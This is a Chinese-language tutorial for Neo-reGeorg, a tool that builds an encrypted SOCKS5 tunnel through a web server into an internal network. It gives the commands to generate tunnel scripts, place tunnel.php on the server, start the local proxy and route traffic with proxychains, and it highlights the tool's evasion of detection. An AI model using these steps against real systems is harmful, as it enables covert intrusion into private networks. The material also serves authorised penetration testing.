Neo-reGeorg
简介
是一款在内网中搭建隧道的工具,基于socks5
它的优势是做了加密处理,避免特征检测,生成的脚本也免杀
原理介绍
两台机器:
kali:作为client
web服务器:作为代理
kali(client)要上传Neo-reGeorg文件,在client运行neoreg.py,生成隧道文件。将隧道文件上传到web服务器,在kali执行命令,进行隧道的搭建。然后在客户端配置proxychains,控制流量的通过1080端口访问Web服务器,进而访问内网。
-
Neo:应用层隧道工具,利用了Socks协议建立隧道
-
Proxychains-Ng:终端代理工具
在Proxychains上配置socks5,如果不配置socks5 127.0.0.1 1080,就不知道哪些流量要经过1080端口转发
使用Neo生成隧道
设置密码并生成隧道文件,运行后会生成一个neoreg_server
目录,里面包含了各种语言类型的隧道文件
python3 neoreg.py generate -k 123456 #密码设置为123456
将相应的隧道文件(tunnel.php)上传到WEB服务器网站根目录下
在kali上运行以下命令,在本地建立Socks代理。
python3 neoreg.py -k <password> -u http://xxx/tunnel.php
不同于ew等端口转发软件,这个是设置web服务器的url
安装Proxychains-Ng
在kali上进行安装,一般情况下kali上自带proxychains,无需安装
# Linux
$ git clone https://github.com/rofl0r/proxychains-ng.git # 下载
$ cd proxychains-ng && ./configure && make && make install # 编译安装
$ cp ./src/proxychains.conf /etc/proxychains.conf # 拷贝配置文件
$ cd .. && rm -rf proxychains-ng # 删除目录(可不执行)
将 socks4 127.0.0.1 9050 改为 socks5 127.0.0.1 1080
用法:
proxychains4 XXX
proxychains4 curl ifconfig.io
Noereg.py -h 可选参数
$ git clone https://github.com/L-codes/Neo-reGeorg.git
$ python3 neoreg.py -h # 查看帮助
# 可选参数:
-h, --help # 显示此帮助信息并退出
-u URI, --url URI # 包含隧道脚本的url
-k KEY, --key KEY # 特定连接密钥
-l IP, --listen-on IP # 默认监听地址 (默认值: 127.0.0.1)
-p PORT, --listen-port PORT # 默认监听端口 (默认值: 1080)
-s, --skip # 跳过可用性测试
-H LINE, --header LINE # 将自定义标题行传递到服务器
-c LINE, --cookie LINE # 自定义到服务器的cookie
-x LINE, --proxy LINE # proto://host[:port] 在给定端口上使用代理
--read-buff Bytes # 本地读取缓冲区,每个日志发送的最大数据(默认值: 1024)
--read-interval MS # 读取数据间隔(毫秒) (默认值: 100)
--max-threads N # 代理最大线程数 (默认值: 1000)
-v # 显示详细信息 (使用-vv或者更多的v显示更详细的信息)